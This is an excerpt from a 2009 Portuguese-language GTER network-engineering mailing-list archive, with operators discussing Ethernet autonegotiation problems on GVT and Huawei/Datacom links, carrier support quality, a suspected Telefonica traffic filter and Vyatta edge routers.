Faleiros) Date: Thu, 4 Jun 2009 11:55:50 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <4A27D277.8010507@jarruda.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <200906032002.49500.herbert@scw.net.br> <4A27D277.8010507@jarruda.com> Message-ID: <200906041155.50866.herbert@scw.net.br> On Thu 04 Jun 2009 10:56:07 Julio Arruda wrote: > 'Se um lado esta em autoneg, e o outro sem autonegociacao, o lado com > autoneg PODE pegar a velocidade (NLP x FLP), so que ele MUST entrar em > half-duplex, e' mais que uma boa ideia, e' a norma' :-).. Sim correto (n?o h? o que questionar), mas (contextualizando) num link desse tamanho half virava uma caca s? (voc? deve imaginar)... Esse era o problema (ou fazia isso ou n?o funcionava, inclusive a carrier "dona" do SDH instrui que fizessemos isso, j? que eles aparentemente n?o sabiam que o problema era a controladora ethernet do SDH deles). N?o estou questionando o uso de desligar ou n?o a negocia??o, o relato foi que sem isso n?o tinha como usar o link e mesmo "for?ando" ainda n?o ficava bom. Quando resolveram consertar a porta FE do SDH auto negociou corretamente 100/full e o link passou a trabalhar da maneira a qual foi projetado. Observa??o: depois que consertaram for?ar 100/full degradou o link, com auto funcionava corretamente. O problema estava na controladora da FE do SDH, nunca me disseram o que foi, mas provavelmente ela estava com a negociacao desligada, al?m do mais, pelo que andei lendo por ai n?o fui o ?nico que teve o mesmo problema com esses SDH's da Huawei (com essa carrier). -- Herbert From henrique.holschuh at ima.sp.gov.br Thu Jun 4 12:38:01 2009 From: henrique.holschuh at ima.sp.gov.br (Henrique de Moraes Holschuh) Date: Thu, 04 Jun 2009 12:38:01 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <1244120435009.Bruno@Openline.com.br> References: <1244120435009.Bruno@Openline.com.br> Message-ID: <4A27EA59.4080301@ima.sp.gov.br> Bruno at Openline.com.br wrote: > --- Herbert Faleiros escreveu: >> Tive um problema num SDH da Huawei que s? era remediado (n?o resolvia) >> for?ando 100/full no Cisco conectado ? FE dele. Isso "melhorava" o dano >> causado pela m? configura??o do SDH, mas nem de longe resolvia. >> >> Quando finalmente resolveram "consertar" o SDH, deixar o NIC do Cisco >> negociar o link (ap?s a FE do Huawei estar funcionando corretamente) >> fez toda a diferen?a do mundo. :) >> >> Antes de resolver o problema, se ficava em auto a FE negociava como >> 100/half e uma infinidade de colis?es e problemas relacionados >> (ocasionando danos ?bvios de performance) ocorriam, for?ando como >> 100/full "melhorava", mas nem de longe resolvia o problema. > > Tive o mesmo problema m?s passado, tamb?m com cisco e Huawei. > A solu??o que demos foi trocar o hauwei por uma metro ethernet > (da concorr?ncia) com fibra + transceivers monomodo Tivemos problemas aqui com a plataforma SDH Metro da Huawei tamb?m. Foi resolvido pela operadora alterando algo na configura??o do Huawei (que, diga-se de passagem, pode ser at? um upgrade de firmware. vai saber...). Antes da altera??o, s? detectava a 100half (ou seja, o autoneg estava desabilitado ou mal-configurado no Huawei), mas n?o havia cristo que fizesse aquela droga funcionar direito, n?o importa o que voc? for?asse no outro equipamento (tentamos 100HD, 100FD, 10HD, 10FD, sem e com flow-control...). Depois da altera??o, funciona perfeitamente em 100FD, sem flow-control, autonegociado. Para mim, parece que ? um problema recorrente em instala??es desse equipamento. Talvez esteja restrito a uma determinada operadora (ou seja, o documento de config. inicial deles ? o problema)? -- Henrique de Moraes Holschuh IM@ - Inform?tica de Munic?pios Associados Projetos Especiais TEL +55-19-3739-6055/CEL +55-19-9293-9464 Antes de imprimir, lembre-se de seu compromisso com o Meio Ambiente e do custo que voc? pode evitar. From henrique.holschuh at ima.sp.gov.br Thu Jun 4 12:48:47 2009 From: henrique.holschuh at ima.sp.gov.br (Henrique de Moraes Holschuh) Date: Thu, 04 Jun 2009 12:48:47 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <4A270C5E.3060804@jarruda.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <4A270C5E.3060804@jarruda.com> Message-ID: <4A27ECDF.1080402@ima.sp.gov.br> Julio Arruda wrote: > Note, voce PODE ter implementacoes especificas....a Nortel tinha o CANA, > acho que a cisco outras, onde voce fazia autoneg, mas somente um subset > era anunciado (voce FAZ autoneg, mas so oferece 100FD por exemplo). A especifica??o de autonegocia??o da IEEE *permite* que voc? anuncie s? um subset. Switches decentes (Cisco, Enterasys, Nortel, etc) permitem que voc? configure isso por porta, SEM desligar a autonegocia??o. Usamos este suporte em switches giga de acesso, onde o cabeamento horizontal CAT5e n?o est? dando conta. A switch publica apenas 100FD, 100HD, 10FD, 10HD e flow-control, deixando de fora o 1000*. -- Henrique de Moraes Holschuh IM@ - Inform?tica de Munic?pios Associados Projetos Especiais TEL +55-19-3739-6055/CEL +55-19-9293-9464 Antes de imprimir, lembre-se de seu compromisso com o Meio Ambiente e do custo que voc? pode evitar. From gustkiller at gmail.com Thu Jun 4 12:50:48 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Thu, 4 Jun 2009 12:50:48 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <4A27ECDF.1080402@ima.sp.gov.br> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <4A270C5E.3060804@jarruda.com> <4A27ECDF.1080402@ima.sp.gov.br> Message-ID: <276fbe8b0906040850w2d6056cfm4fe99cc45e5be326@mail.gmail.com> Interessante... o 5E n?o seria compativel com 1000(gigabit?) . 2009/6/4 Henrique de Moraes Holschuh > Julio Arruda wrote: > >> Note, voce PODE ter implementacoes especificas....a Nortel tinha o CANA, >> acho que a cisco outras, onde voce fazia autoneg, mas somente um subset era >> anunciado (voce FAZ autoneg, mas so oferece 100FD por exemplo). >> > > A especifica??o de autonegocia??o da IEEE *permite* que voc? anuncie s? um > subset. Switches decentes (Cisco, Enterasys, Nortel, etc) permitem que voc? > configure isso por porta, SEM desligar a autonegocia??o. > > Usamos este suporte em switches giga de acesso, onde o cabeamento > horizontal CAT5e n?o est? dando conta. A switch publica apenas 100FD, > 100HD, 10FD, 10HD e flow-control, deixando de fora o 1000*. > > -- > Henrique de Moraes Holschuh > IM@ - Inform?tica de Munic?pios Associados > Projetos Especiais > TEL +55-19-3739-6055/CEL +55-19-9293-9464 > > Antes de imprimir, lembre-se de seu compromisso com o Meio Ambiente > e do custo que voc? pode evitar. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From rubensk at gmail.com Thu Jun 4 14:02:30 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Thu, 4 Jun 2009 14:02:30 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> Message-ID: <6bb5f5b10906041002w767b9542ua778293e8d9751d2@mail.gmail.com> Infelizmente a rede metro da CTBC ? quase toda DATACOM, com alguns Cisco apenas quando necess?rios features tipo QinQ. Espero que seu e-mail chegue a algu?m de l?... Rubens 2009/6/3 Andr? Costa : > Caros colegas, > > Se for envolvido equipamento DATACOM realmente existe at? uma nota no site > deles falando sobre o assunto, as teles tem seguido o conselho de for?ar a > porta. > > Aqui na empresa resolvemos n?o utilizar mais DATACOM por esses e outros > problemas. S?o equipamentos muito problem?tico e suporte ? p?ssimo. > > > > 2009/6/3 Patrich Pizzolo > >> Obrigado pelas respostas, >> n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias >> atr?s este problema aqui, s? ficou ok quando forcei minha eth para 100Mbps >> Full-Duplex! >> Por?m o problema est? bem isolado, j? coloquei diversos notebooks e >> desktops >> e o problema sempre persiste sim! >> >> Creio que seja exatamente o caso de porta do Switch Datacom no qual o >> Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de conta >> e ouvidoria para verificarem isto e eles continuam afirmando >> categoricamente >> que n?o h? problema! >> >> Alguma id?ia? >> >> >> 2009/6/3 Juliano S. Nascimento >> >> > >> > >> > >> > > Voce checou poss?veis port-mismatch ? >> > Auto-negocia??o X portas for?adas ? >> > > >> > > Corre uma lenda por a? que as portas fastethernet devem ser >> > for?adas a >> > > 100Mb/s. Na verdade essa hist?ria >> > remonta h? anos quando existia um bug na >> > > >> > negocia??o de alguns equipamentos que faziam os mesmos >> > negociarem como >> > > half. >> > > Isso acabou e s? sobrou a >> > lenda. >> > > >> > > A regra ?: >> > > >> > > - >> > Auto-negocia??o com auto-negoci???o >> > > - Porta for?ada (sem autoneg) com Porta for?ada >> > > >> > > Qualquer outra combina??o trar? >> > problemas. >> > > >> > > Voc? colocou 1 notebook ligado >> > direto no link para eliminar problemas com >> > > sua rede, seu >> > firewall, etc? >> > > >> > > Grato. >> > > >> > > 2009/6/3 >> > Patrich Pizzolo >> > > >> > >> Bom dia >> > a todos, >> > >> gostaria de ter uma opini?o dos ilustres >> > colegas que integram esta >> > >> lista. >> > >> Tenho um link >> > de 10Mbps por fibra e ap?s um problema em um switch da GVT >> > >> meu >> > >> tempo de resposta entre a Eth do meu router e >> > a do router da gvt que s?o >> > >> interligados por uma fibra >> > est? chegando a picos de at? 946ms com uma >> > >> >> > m?dia >> > >> em torno de 10ms, isso com o link isolado e >> > j? testei com diversos >> > >> outros >> > >> routers e >> > sempre obtenho os mesmos tempos de resposta, definitivamente >> > >> >> > n?o >> > >> tenho problema nesta ponta. Possuo um outro link >> > com a BrT e est? tudo >> > >> normal com tempo de resposta >> > excelente sem nenhuma varia??o deste tipo. >> > >> >> > Estou nesta situa??o h? 7 dias e o pessoal da >> > operadora insiste em dizer >> > >> que >> > >> est? >> > tudo normal. J? nem aguento mais falar com eles... >> > >> >> > >> Algu?m tem alguma id?ia? >> > >> >> > >> No momento estou pensando em acionar e cancelar o link. >> > >> > Caro, >> > >> > Tivemos o mesmo problema algum tempo atras com a >> > GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal >> > configurados e n?o terem resultados positivos com esta >> > afirma??o, trocaram nossa porta no Switch deles, resolvendo >> > nosso problema. >> > >> > OBS: Alegaram que a vlan estava com uma >> > configura??o errada, ocasionado tais problemas. >> > >> > >> > >> > >> >> > >> Abra?os, >> > >> >> > Obrigado! >> > >> -- >> > >> gter list >> > https://eng.registro.br/mailman/listinfo/gter >> > >> >> > > >> > -- >> > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > >> > >> > >> > -- >> > >> > >> > -- >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > >> >> >> >> -- >> Abra?os, >> >> Patrich Pizzolo >> IT Coordinator >> +55-48-9944-9090 >> +55-47-8407-7768 >> pizzolo at gmail.com >> Skype: pizzolo_br >> MSN: patrich_pizzolo at hotmail.com >> SL: Xpiz Beam >> Taikodom: Deathwing_br >> ?-- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > > > -- > Andr? Costa > Chief Executive Officer > Ib?ria Brasil Telecomunica??es > (71) 2223-9026 / 7811-5816 > NEXTEL 55*91*9228 > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter From rubensk at gmail.com Thu Jun 4 14:03:44 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Thu, 4 Jun 2009 14:03:44 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <200906031715.08601.herbert@scw.net.br> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br> Message-ID: <6bb5f5b10906041003u3080c35ex64f1cd0d6b7a3ffb@mail.gmail.com> Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor do que a nossa. Rubens > Ontem tive problemas com um link Algar (CTBC), o atendimento foi super r?pido, > o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava > falando, anotaram todos os dados pertinentes e em poucos minutos algu?m n?vel > 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem o > problema ligaram novamente perguntando como estava o link! > > Quem est? acostumado com a Telefonica (com aquele 0800 que quando consegue > falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e nunca > resolvem nada) se espanta com um atendimento como esse (que relatei sobre a > Algar). > > -- > Herbert > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From juliano at cyberweb.com.br Thu Jun 4 14:12:35 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Thu, 04 Jun 2009 14:12:35 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <6bb5f5b10906041003u3080c35ex64f1cd0d6b7a3ffb@mail.gmail.com> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br> <6bb5f5b10906041003u3080c35ex64f1cd0d6b7a3ffb@mail.gmail.com> Message-ID: <4A280083.9070207@cyberweb.com.br> Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, acabei eu mesmo por resolver um certo problema de publica??o de rotas... Juliano Rubens Kuhl escreveu: > Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor > do que a nossa. > > > Rubens > > > >> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super r?pido, >> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava >> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m n?vel >> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem o >> problema ligaram novamente perguntando como estava o link! >> >> Quem est? acostumado com a Telefonica (com aquele 0800 que quando consegue >> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e nunca >> resolvem nada) se espanta com um atendimento como esse (que relatei sobre a >> Algar). >> >> -- >> Herbert >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From edinilson at atinet.com.br Thu Jun 4 17:18:24 2009 From: edinilson at atinet.com.br (Edinilson - ATINET) Date: Thu, 4 Jun 2009 17:18:24 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br><6bb5f5b10906041003u3080c35ex64f1cd0d6b7a3ffb@mail.gmail.com> <4A280083.9070207@cyberweb.com.br> Message-ID: <6ECDBF9BB24F4C2991D5C7295C83FD3C@atinet.com.br> Aqui eu ando meio frustrado com a "latencia" no atendimento da Global Crossing. -Demoram para o 1o. contato (que normalmente nao sabe de nada); -Demoram mais 4 horas para o 2o. contato (alguem que nao sabe fazer, mas sabe de alguem que sabe); -Demoram mais 12 horas para o 3o. contato (realmente quem vai resolver). Normalmente 2 dias depois. -E, por fim, nunca retornam dizendo se o chamado foi ou nao fechado. Quem tem acesso com Global Crossing, poderia confirmar se ? normal isto? Obrigado Edinilson --------------------------------------------------------- ATINET-Professional Web Hosting Tel Voz: (0xx11) 4412-0876 http://www.atinet.com.br ----- Original Message ----- From: "Juliano Primavesi - Cyberweb Networks" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Thursday, June 04, 2009 2:12 PM Subject: Re: [GTER] RES: Ainda problemas com a telefonica Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, acabei eu mesmo por resolver um certo problema de publica??o de rotas... Juliano Rubens Kuhl escreveu: > Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor > do que a nossa. > > > Rubens > > > >> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super >> r?pido, >> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava >> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m >> n?vel >> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem o >> problema ligaram novamente perguntando como estava o link! >> >> Quem est? acostumado com a Telefonica (com aquele 0800 que quando >> consegue >> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e >> nunca >> resolvem nada) se espanta com um atendimento como esse (que relatei sobre >> a >> Algar). >> >> -- >> Herbert >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From epafras at ctbc.com.br Thu Jun 4 17:55:49 2009 From: epafras at ctbc.com.br (epafras at ctbc.com.br) Date: Thu, 4 Jun 2009 17:55:49 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <4A280083.9070207@cyberweb.com.br> Message-ID: Grandes Mestres (Hebert, Rubens, Juliano and all), ? sempre bom para n?s ouvirmos depoimentos legais como o do Hebert e trabalhamos sempre para que tenhamos mais e mais fatos como este aqui na CTBC. Tamb?m pessoalmente n?o tenho a inten??o de resolver todos os problemas mas, se algum de voc?s tiver alguma complica??o no relacionamento conosco, principalmente com rela??o a roteamento (?rea que me compete), fiquem a vontade em me acionar diretamente... no demais, estamos trabalhando para melhorar sempre... at? IPv6 aqui j? funciona n?o eh Juliano ??? :-) Valeu.. Abs.. Epafras Schaden Engenharia de Redes IP CTBC/Algar Telecom Re: [GTER] RES: Ainda problemas com a telefonica Juliano Primavesi - Cyberweb Networks para: Grupo de Trabalho de Engenharia e Operacao de Redes 04/06/2009 14:09 Enviado por: gter-bounces at eng.registro.br Responda a Grupo de Trabalho de Engenharia e Operacao de Redes Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, acabei eu mesmo por resolver um certo problema de publica??o de rotas... Juliano Rubens Kuhl escreveu: > Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor > do que a nossa. > > > Rubens > > > >> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super r?pido, >> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava >> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m n?vel >> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem o >> problema ligaram novamente perguntando como estava o link! >> >> Quem est? acostumado com a Telefonica (com aquele 0800 que quando consegue >> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e nunca >> resolvem nada) se espanta com um atendimento como esse (que relatei sobre a >> Algar). >> >> -- >> Herbert >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From henrique.holschuh at ima.sp.gov.br Thu Jun 4 18:28:11 2009 From: henrique.holschuh at ima.sp.gov.br (Henrique de Moraes Holschuh) Date: Thu, 04 Jun 2009 18:28:11 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <276fbe8b0906040850w2d6056cfm4fe99cc45e5be326@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <4A270C5E.3060804@jarruda.com> <4A27ECDF.1080402@ima.sp.gov.br> <276fbe8b0906040850w2d6056cfm4fe99cc45e5be326@mail.gmail.com> Message-ID: <4A283C6B.9080409@ima.sp.gov.br> Gustavo Santos wrote: > Interessante... o 5E n?o seria compativel com 1000(gigabit?) . Se estiver tudo perfeito, perfeito, fala sim (sem ficar renegociando). Mas o cabeamento horizontal no local onde fazemos isso ? cat5e s? no nome. Foi t?o mal instalado, que eu vou me surpreender se atingir cat5, acho que est? mais ? para cat 4 1/2 mesmo... N?o ? s? porque o enlace subiu que est? bom :) A taxa de erro tem que ser bem baixa... isso vale at? mesmo para o enlace da switch pro PC... -- Henrique de Moraes Holschuh IM@ - Inform?tica de Munic?pios Associados Projetos Especiais TEL +55-19-3739-6055/CEL +55-19-9293-9464 Antes de imprimir, lembre-se de seu compromisso com o Meio Ambiente e do custo que voc? pode evitar. From alexandre at telbrax.com.br Thu Jun 4 17:24:04 2009 From: alexandre at telbrax.com.br (Alexandre Flach) Date: Thu, 4 Jun 2009 17:24:04 -0300 Subject: [GTER] RES: RES: Ainda problemas com a telefonica In-Reply-To: <6ECDBF9BB24F4C2991D5C7295C83FD3C@atinet.com.br> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br><6bb5f5b10906041003u3080c35ex64f1cd0d6b7a3ffb@mail.gmail.com> <4A280083.9070207@cyberweb.com.br> <6ECDBF9BB24F4C2991D5C7295C83FD3C@atinet.com.br> Message-ID: <00da01c9e552$6c1ae270$4450a750$@com.br> Est?vamos tendo esse mesmo problema e tive que colocar meu gerente de contas no meio pra poderem entrar em contato comigo e resolver. O primeiro n?vel deles aqui no Brasil ? realmente problem?tico. Atenciosamente, Alexandre Flach Diretoria Telbrax Ltda. Tel.: (31) 2555.5550 Fax: (31) 3283.6267 E-mail: alexandre at telbrax.com.br Telbrax - Solu??es que conectam sua empresa. Acesse: www.telbrax.com.br -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Edinilson - ATINET Enviada em: quinta-feira, 4 de junho de 2009 17:18 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] RES: Ainda problemas com a telefonica Aqui eu ando meio frustrado com a "latencia" no atendimento da Global Crossing. -Demoram para o 1o. contato (que normalmente nao sabe de nada); -Demoram mais 4 horas para o 2o. contato (alguem que nao sabe fazer, mas sabe de alguem que sabe); -Demoram mais 12 horas para o 3o. contato (realmente quem vai resolver). Normalmente 2 dias depois. -E, por fim, nunca retornam dizendo se o chamado foi ou nao fechado. Quem tem acesso com Global Crossing, poderia confirmar se ? normal isto? Obrigado Edinilson --------------------------------------------------------- ATINET-Professional Web Hosting Tel Voz: (0xx11) 4412-0876 http://www.atinet.com.br ----- Original Message ----- From: "Juliano Primavesi - Cyberweb Networks" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Thursday, June 04, 2009 2:12 PM Subject: Re: [GTER] RES: Ainda problemas com a telefonica Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, acabei eu mesmo por resolver um certo problema de publica??o de rotas... Juliano Rubens Kuhl escreveu: > Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor > do que a nossa. > > > Rubens > > > >> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super >> r?pido, >> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava >> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m >> n?vel >> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem o >> problema ligaram novamente perguntando como estava o link! >> >> Quem est? acostumado com a Telefonica (com aquele 0800 que quando >> consegue >> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e >> nunca >> resolvem nada) se espanta com um atendimento como esse (que relatei sobre >> a >> Algar). >> >> -- >> Herbert >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter From oliveira at unidatec.com.br Thu Jun 4 20:46:52 2009 From: oliveira at unidatec.com.br (Daniel Oliveira) Date: Thu, 4 Jun 2009 20:46:52 -0300 Subject: [GTER] Filtro Telefonica. Message-ID: <47B13B11-9299-4EBD-84C6-A14CC22A3918@unidatec.com.br> Amigos, Possuo um link "speedy" cujo ip fixo esta no bloco 200.204.x.x Tenho tamb?m um servidor de hospedagem na The Planet 66.98.140.x H? 1 semana venho tendo problemas para acessar do meu speedy, sites que est?o no IP citado (the planet). Consigo enviar pacotes ICMP (ping) mas n?o consigo acessar nenhum dos sites tanto 80 quanto 21, 22, 53, 110 e outras portas importantes. De outros links, como virtua e etc, consigo acessar todos os sites normalmente. Com base no ultimo ataque que a telefonica sofreu, existe alguma possibilidade de existir um filtro impedindo esse acesso? pois imagino que meu IP fixo esta entre alguns servidores da telefonica por iniciar com 200.204..., e como a maioria dos ataques partem dos datacenters de fora (como the planet) estou com essa impress?o. O suporte da telefonica afirma que o problema ser? resolvido em 24 horas, mas isso foi antes de ontem e at? agora nada. O que pode ser? Obrigado... Daniel From herlon at lcimt.com.br Thu Jun 4 14:41:36 2009 From: herlon at lcimt.com.br (Herlon Alcantara Matos) Date: Thu, 4 Jun 2009 13:41:36 -0400 Subject: [GTER] roteador de borda References: Message-ID: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> Eu utilizo Vyatta. O Vyatta no meu caso com volume de trafego em torno de 30 MB ? altamente estavel, interface simples e para uma quantidade desta de link em uma maquina com boas placas de rede , preferencialmente INTEL, voc? ira trabalhar tranquilamente. Herlon LCI Telecom From fcricardo at msn.com Thu Jun 4 15:00:04 2009 From: fcricardo at msn.com (Ricardo Castanheira) Date: Thu, 4 Jun 2009 18:00:04 +0000 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <6bb5f5b10906041002w767b9542ua778293e8d9751d2@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <6bb5f5b10906041002w767b9542ua778293e8d9751d2@mail.gmail.com> Message-ID: Rubens, a rede da CTBC "Metro" ? 100% cisco. O produtos da DataCom n?o est?o nem homologados. Fora da rede metro pode haver sim. Abra?os Ricardo Castanheira > Date: Thu, 4 Jun 2009 14:02:30 -0300 > From: rubensk at gmail.com > To: gter at eng.registro.br > Subject: Re: [GTER] Problemas GVT - o que fazer? > > Infelizmente a rede metro da CTBC ? quase toda DATACOM, com alguns > Cisco apenas quando necess?rios features tipo QinQ. Espero que seu > e-mail chegue a algu?m de l?... > > > Rubens > > > 2009/6/3 Andr? Costa : > > Caros colegas, > > > > Se for envolvido equipamento DATACOM realmente existe at? uma nota no site > > deles falando sobre o assunto, as teles tem seguido o conselho de for?ar a > > porta. > > > > Aqui na empresa resolvemos n?o utilizar mais DATACOM por esses e outros > > problemas. S?o equipamentos muito problem?tico e suporte ? p?ssimo. > > > > > > > > 2009/6/3 Patrich Pizzolo > > > >> Obrigado pelas respostas, > >> n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias > >> atr?s este problema aqui, s? ficou ok quando forcei minha eth para 100Mbps > >> Full-Duplex! > >> Por?m o problema est? bem isolado, j? coloquei diversos notebooks e > >> desktops > >> e o problema sempre persiste sim! > >> > >> Creio que seja exatamente o caso de porta do Switch Datacom no qual o > >> Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de conta > >> e ouvidoria para verificarem isto e eles continuam afirmando > >> categoricamente > >> que n?o h? problema! > >> > >> Alguma id?ia? > >> > >> > >> 2009/6/3 Juliano S. Nascimento > >> > >> > > >> > > >> > > >> > > Voce checou poss?veis port-mismatch ? > >> > Auto-negocia??o X portas for?adas ? > >> > > > >> > > Corre uma lenda por a? que as portas fastethernet devem ser > >> > for?adas a > >> > > 100Mb/s. Na verdade essa hist?ria > >> > remonta h? anos quando existia um bug na > >> > > > >> > negocia??o de alguns equipamentos que faziam os mesmos > >> > negociarem como > >> > > half. > >> > > Isso acabou e s? sobrou a > >> > lenda. > >> > > > >> > > A regra ?: > >> > > > >> > > - > >> > Auto-negocia??o com auto-negoci???o > >> > > - Porta for?ada (sem autoneg) com Porta for?ada > >> > > > >> > > Qualquer outra combina??o trar? > >> > problemas. > >> > > > >> > > Voc? colocou 1 notebook ligado > >> > direto no link para eliminar problemas com > >> > > sua rede, seu > >> > firewall, etc? > >> > > > >> > > Grato. > >> > > > >> > > 2009/6/3 > >> > Patrich Pizzolo > >> > > > >> > >> Bom dia > >> > a todos, > >> > >> gostaria de ter uma opini?o dos ilustres > >> > colegas que integram esta > >> > >> lista. > >> > >> Tenho um link > >> > de 10Mbps por fibra e ap?s um problema em um switch da GVT > >> > >> meu > >> > >> tempo de resposta entre a Eth do meu router e > >> > a do router da gvt que s?o > >> > >> interligados por uma fibra > >> > est? chegando a picos de at? 946ms com uma > >> > >> > >> > m?dia > >> > >> em torno de 10ms, isso com o link isolado e > >> > j? testei com diversos > >> > >> outros > >> > >> routers e > >> > sempre obtenho os mesmos tempos de resposta, definitivamente > >> > >> > >> > n?o > >> > >> tenho problema nesta ponta. Possuo um outro link > >> > com a BrT e est? tudo > >> > >> normal com tempo de resposta > >> > excelente sem nenhuma varia??o deste tipo. > >> > >> > >> > Estou nesta situa??o h? 7 dias e o pessoal da > >> > operadora insiste em dizer > >> > >> que > >> > >> est? > >> > tudo normal. J? nem aguento mais falar com eles... > >> > >> > >> > >> Algu?m tem alguma id?ia? > >> > >> > >> > >> No momento estou pensando em acionar e cancelar o link. > >> > > >> > Caro, > >> > > >> > Tivemos o mesmo problema algum tempo atras com a > >> > GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal > >> > configurados e n?o terem resultados positivos com esta > >> > afirma??o, trocaram 